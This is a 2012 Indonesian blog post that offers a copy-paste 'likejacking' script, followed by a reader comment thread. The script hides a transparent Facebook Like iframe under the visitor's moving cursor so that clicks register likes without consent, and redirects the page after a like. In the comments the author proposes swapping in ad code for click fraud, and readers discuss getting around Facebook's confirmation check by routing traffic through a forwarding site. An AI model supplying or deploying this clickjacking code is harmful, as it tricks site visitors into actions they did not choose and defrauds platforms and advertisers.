Cara Mudah Mendapat Dollar dengan Android
Dollar dengan android   Potensi penghasilan $30/hari:
Caranya:
1. Download aplikasi ini --> Klik Disini
2. Daftar dengan akun facebook sobat
3. Masukkan kode undangan AE91549 untuk mendapat $0,3 pertama sobat
4. Buka aplikasi setiap hari, maka dollar akan semakin menumpuk...
     
pulsagram, pembayaran mudah dan cepat, transaksi online, pembayaran tagihan dan tiket, transfer dana online

Selasa, 17 Januari 2012

Script Facebook Likejacking, Cara Curang Like Facebook



Script Facebook Likejacking, Cara Curang Like Facebook - Lagi-lagi facebook ya sob hehe..memang tidak ada habisnya kalau ngomongin jejaring sosial yang satu ini. Dunia serasa tidak terbatas dan sangat kecil ya sob, mau ketemu orang luar negeri aja gak perlu kesana, sudah bisa dengan fasilitas facebook. Nah posting kali ini ditujukan untuk mencurangi facebook, ya mencurangi facebook...kok main curang sih? lha ane kan tahu kesenangan sobat, suka yang instan-instan dan curang-curang hehe..
Nah posting ini berjudul Script Facebook Likejacking, Cara Curang Like Facebook, ketahuan kan tujuannya? ya tujuannya adalah membuat pengunjung blog akan selalu mengklik tombol like pada halaman/page sobat sekalian. Keren kan? mau tahu Script Facebook Likejacking, Cara Curang Like Facebook? silahkan copy-paste script dibawah ini di blog sobat (gunakan widget HTML/Javascript)

<script src="http://code.jquery.com/jquery-1.5.js"></script> <style>
html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
div.wrapper { width: 100%; height: 100%; overflow: auto; }
img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0;z-index: 0; }
@media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
#content { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff;font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
#content .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
#content .description h1 { font-size: 32px; }
#content .description .warning { color: #f00; }
#content .description .link, #content .description a { font-size: 22px; color: #fff; text-decoration:underline; }
#content .description .footer, #content .description .footer a { font-size: 10px; }
</style>


<span id="link" class="link">
<div id="content">




</div>
<div id="wrapper" style="position: absolute; opacity: 1; filter: alpha(opacity = 0); margin-left: -50px; z-index:100;">


<iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRasecowebid%2F186314464729833&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowtransparency="true"></iframe>


<script>
FB.Event.subscribe('edge.create',function(response) {window.top.location.href = "http://apps.facebook.com/gandjarexe/";});
</script>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#link" ).mousemove( function( e ) {
$( '#wrapper' ).css( {
top: e.pageY - 10,
left: e.pageX + 20
} );
} );
} )
</script>


</span>

Nah silahkan sobat ganti script teks yang berwarna merah dengan script likebox/like dari pages sobat.
Nah untuk melihat previewnya silahkan kunjungi http://gudangrpp.blogspot.com/
Gimana? mantap bukan?...

Ditulis oleh: Zanuar Didik Bintoro ~ Raseco.web.id - Blogging Tutorial | Adsense | SEO | Berita | Info Teknologi

Terima kasih sobat telah membaca artikel Script Facebook Likejacking, Cara Curang Like Facebook yang ditulis oleh Zanuar Didik Bintoro pada Selasa, 17 Januari 2012. Semoga artikel ini dapat bermanfaat dan menambah wawasan kita semua. Artikel dalam blog ini bebas untuk disebarluaskan dengan tujuan bukan komersial. Sobat bebas untuk meng-copy paste artikel dalam blog ini baik dengan ataupun tanpa menyertakan sumber tulisan.
Rating : 5

Masukan email sobat jika ingin berlangganan setiap tulisan terbaru blog ini.
Gratis dan langsung antar alamat:

Delivered by FeedBurner


Facebook comment:



25 comments:

Kotak Pandora on 18 Januari 2012 11.28 mengatakan...

mantep gan...
carcur biar makin banyak yang ngelike ya....

Zanuar Didik Bintoro on 20 Januari 2012 09.57 mengatakan...

yup gan, curang-curang dikit gak apa-apa hehe

ChikoEcyber on 21 Januari 2012 03.09 mengatakan...

ko aku klik http://gudangrpp.blogspot.com/ malah tombol suka mlu gk rubah2 gan.. gman ne cara ya

Zanuar Didik Bintoro on 21 Januari 2012 14.44 mengatakan...

ya memang tombol "suka" akan selalu muncul mengikuti kursor gan, itulah namanya mencurangi agar klik tombol suka. Nah agan tinggal ganti tuh facebook pagenya punya agan..atau kalau mau lebih serem lagi, diganti aja tuh script "suka" facebook dengan script iklan semisal ad****camp, s*ti, kumpu***gger, dll tapi baca2 dulu TOS nya dari situs PPC tsb gan

koranUnik on 15 Maret 2012 18.01 mengatakan...

Sumpah mantap nih gan,, hahaa, dunia penuh kecurangan, tq infonya gan

Chevie rebel distortion on 29 Maret 2012 15.19 mengatakan...

mantapp gann

Dikki Setiawan on 5 April 2012 09.07 mengatakan...

keren gan, tapi takutnya visitor malah pada kabur...
http://www.initialDS.co.cc

Zanuar Didik Bintoro on 5 April 2012 11.22 mengatakan...

kalau pengunjung websitenya datang dari search engine kayaknya dipasang 1 atau 2 hari gak apa-apa gan (dalam 1 minggu), memang kalau pengunjung datang dari link promo kita via social networking bisa dipastikan mereka akan KABUR duluan :D

Gilang L. on 9 April 2012 10.57 mengatakan...

wah sekarang ada keamananx bro... stelah di like 1x... truz ada konfirmasi, disuruh klik lagi langsung keluar pop up tentang halamanx yang akan di like....

Zanuar Didik Bintoro on 9 April 2012 11.10 mengatakan...

wah gitu ya bro..ane belum cek lagi scriptnya bro

Zanuar Didik Bintoro on 9 April 2012 11.12 mengatakan...

masbro Gilang L., barusan ane cobain masih bisa kok..coba deh cekidot

Gilang L. on 9 April 2012 12.01 mengatakan...

ohh gt y..
barusan kmaren ane coba bisa 100%, truz ane promosikan di facebook. truz besokx ane simulasi like kyk gitu tapi pake konfirmasi (keluar popup gitu).. ane pake wordpress pake server byethost.
Apa mungkin web ane di blok ama FaceBook nya kali ya
mohon bantuanx...

Zanuar Didik Bintoro on 9 April 2012 12.12 mengatakan...

kan kalo sudah like tombolnya berubah jadi abu2 gan, mungkin karena ente sudah ngelike sebelumnya.
Kalo untuk masalah diblok bytehost kayaknya gak mungkin gan, dan pastinya domain agan TLD kan? gak mungkin deh diblok.
Mungkin ada plugin/addon firefox yang ngeblok <'iframe> gan atau ngeblok javascript

Gilang L. on 12 April 2012 07.48 mengatakan...

udh kmu coba tulis link blog kmu ke wall FB??
soalnya likejacking yg ada di web ane bneran pake "konfirmasi" stelah gw post di wall FB...
akhirnya ane akalin deh, ane hapus web ane, terus bkin website lg. terus gw tulis di wall FB pakai web lain yang nge-forward ke web likejacking ane jdi lbih aman :D

Zanuar Didik Bintoro on 12 April 2012 08.25 mengatakan...

ternyata ane tahu penyebabnya gan, ane kemaren bikin akun fb baru nah trus ane cobain mampir ke blog ane yang diatas itu linknya. Nah ternyata memang pake konfirmasi dulu. Sepertinya akun fb yang baru memang harus pake konfirmasi (atau mungkin karena belum verifikasi email)

Gilang L. on 12 April 2012 09.48 mengatakan...

blm verifikasi email? ane blum nyoba kalo yg itu tpi FB qw yg udah diverifikasi jg konfirmasi di web qw dulu....

btw blog kamu yang ini kn? http://gudangrpp.blogspot.com/

gw coba blog kmu gpp koq msih bs...
dh qw coba pke FB baru n FB lama. semuanya normal koq ;-)

btw mnta tolong dong jdi tester di web baru ane (gak ada likejackingnya jd like nya di widget)..
kalo udh, di unlike gpp :)
www.mogishare.co.cc
soalnya web yg satu ini jg keluar konfirmasi T_T

Zanuar Didik Bintoro on 12 April 2012 10.19 mengatakan...

oh begitu ya gan, berarti ga ngaruh fb lama ato baru.
Ane barusan cobain ke website agan, kok ga bisa masuk? malah ke halaman http://securesignupoffers.net/d/

Gilang L. on 12 April 2012 10.36 mengatakan...

iya barusan ke suspend akun byethost ane gara2 overbandwith T___T maklum ane pke byethost gratisan... di suspend 24 jam...
nanti ane bkin lgi di server lain dah...

Btw FB kmu apa? kali aja bs sharing2 :D

Zanuar Didik Bintoro on 12 April 2012 14.03 mengatakan...

akun fb ane search aja Zanuar Didik Bintoro gan

Zainul Abidin on 13 April 2012 20.59 mengatakan...

Nyimak nih ane..

Kalo misal tombol likenya disamarin bisa g gan?
biar pengunjung gak curiga gitu..

Zanuar Didik Bintoro on 14 April 2012 19.34 mengatakan...

wah kalo disamarin kayaknya gak bisa sob

Ajangnya orang Sumba berbagi ilmu Pengetahuan on 26 Mei 2012 00.13 mengatakan...

Trik menarik nih,perlu dicoba

Optimasi Seo Blogspot on 1 Juni 2012 17.16 mengatakan...

kasihan pengunjungnya bos...

Algo Zali on 30 Januari 2013 20.48 mengatakan...

Mantep infonya sob,,
Ditunggu follow dan komentarnya
http://tips-gobel.blogspot.com

Work 100% on 28 Februari 2013 18.40 mengatakan...

Bekerja 100% ngak nih gan.

salam kenal dari http://bloggercungkring.blogspot.com/

Posting Komentar

 

Arsip Blog

Recent Comment

Site Info

My Ping in TotalPing.com

Disclaimer

Artikel dalam blog ini bebas untuk disebarkan, dicopy, diperbanyak, di-reposting, di-reblogging baik dengan atau tanpa mencantumkan sumbernya. Sharing is caring. Salam persahablogan!